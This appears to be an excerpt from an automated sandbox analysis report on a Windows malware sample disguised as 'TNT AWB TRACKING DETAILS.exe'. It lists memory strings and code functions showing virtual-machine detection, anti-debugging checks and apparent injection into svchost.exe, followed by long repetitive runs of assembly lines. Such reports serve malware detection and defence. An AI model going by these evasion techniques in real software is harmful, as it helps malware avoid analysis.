          Source: explorer.exe, 00000003.00000000.1463778211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3092275070.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008796000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWe
          Source: explorer.exe, 00000003.00000002.3851024498.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3092275070.00000000087C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.00000000087C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000002.3832268216.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000^F1O
          Source: explorer.exe, 00000003.00000003.2290728057.00000000087C0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000d
          Source: explorer.exe, 00000003.00000003.3084837217.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000003.00000003.3084837217.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}l
          Source: explorer.exe, 00000003.00000002.3832268216.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000003.00000003.3084837217.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.3084837217.00000000088E6000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
          Source: explorer.exe, 00000003.00000002.3832268216.0000000000A44000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | API call chain: ExitProcess graph end node graph_0-87269
          Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00409AB0 rdtsc 2_2_00409AB0
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040ACF0 LdrLoadDll, 2_2_0040ACF0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_03F3B6E0 mov eax, dword ptr fs:[00000030h] 0_2_03F3B6E0
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_03F39588 mov eax, dword ptr fs:[00000030h] 0_2_03F39588
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_03F39528 mov eax, dword ptr fs:[00000030h] 0_2_03F39528
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_03F3CD90 mov eax, dword ptr fs:[00000030h] 0_2_03F3CD90
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exe | Code function: 0_2_03F3CD30 mov eax, dword ptr fs:[00000030h] 0_2_03F3CD30
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B2349 mov eax, dword ptr fs:[00000030h] 2_2_034B2349
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h] 2_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B035C mov ecx, dword ptr fs:[00000030h] 2_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_034B035C mov eax, dword ptr fs:[00000030h] 2_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B035C mov eax, dword ptr fs:[00000030h]2_2_034B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034FA352 mov eax, dword ptr fs:[00000030h]2_2_034FA352
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D8350 mov ecx, dword ptr fs:[00000030h]2_2_034D8350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350634F mov eax, dword ptr fs:[00000030h]2_2_0350634F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D437C mov eax, dword ptr fs:[00000030h]2_2_034D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A30B mov eax, dword ptr fs:[00000030h]2_2_0346A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C310 mov ecx, dword ptr fs:[00000030h]2_2_0342C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03450310 mov ecx, dword ptr fs:[00000030h]2_2_03450310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov ecx, dword ptr fs:[00000030h]2_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03508324 mov eax, dword ptr fs:[00000030h]2_2_03508324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC3CD mov eax, dword ptr fs:[00000030h]2_2_034EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A3C0 mov eax, dword ptr fs:[00000030h]2_2_0343A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034383C0 mov eax, dword ptr fs:[00000030h]2_2_034383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B63C0 mov eax, dword ptr fs:[00000030h]2_2_034B63C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov ecx, dword ptr fs:[00000030h]2_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE3DB mov eax, dword ptr fs:[00000030h]2_2_034DE3DB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D43D4 mov eax, dword ptr fs:[00000030h]2_2_034D43D4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034403E9 mov eax, dword ptr fs:[00000030h]2_2_034403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E3F0 mov eax, dword ptr fs:[00000030h]2_2_0344E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034663FF mov eax, dword ptr fs:[00000030h]2_2_034663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E388 mov eax, dword ptr fs:[00000030h]2_2_0342E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345438F mov eax, dword ptr fs:[00000030h]2_2_0345438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03428397 mov eax, dword ptr fs:[00000030h]2_2_03428397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov eax, dword ptr fs:[00000030h]2_2_034B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B8243 mov ecx, dword ptr fs:[00000030h]2_2_034B8243
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0350625D mov eax, dword ptr fs:[00000030h]2_2_0350625D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A250 mov eax, dword ptr fs:[00000030h]2_2_0342A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436259 mov eax, dword ptr fs:[00000030h]2_2_03436259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EA250 mov eax, dword ptr fs:[00000030h]2_2_034EA250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434260 mov eax, dword ptr fs:[00000030h]2_2_03434260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342826B mov eax, dword ptr fs:[00000030h]2_2_0342826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034E0274 mov eax, dword ptr fs:[00000030h]2_2_034E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342823B mov eax, dword ptr fs:[00000030h]2_2_0342823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343A2C3 mov eax, dword ptr fs:[00000030h]2_2_0343A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035062D6 mov eax, dword ptr fs:[00000030h]2_2_035062D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402E1 mov eax, dword ptr fs:[00000030h]2_2_034402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E284 mov eax, dword ptr fs:[00000030h]2_2_0346E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B0283 mov eax, dword ptr fs:[00000030h]2_2_034B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504164 mov eax, dword ptr fs:[00000030h]2_2_03504164
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov eax, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DE10E mov ecx, dword ptr fs:[00000030h]2_2_034DE10E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D4180 mov eax, dword ptr fs:[00000030h]2_2_034D4180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034280A0 mov eax, dword ptr fs:[00000030h]2_2_034280A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
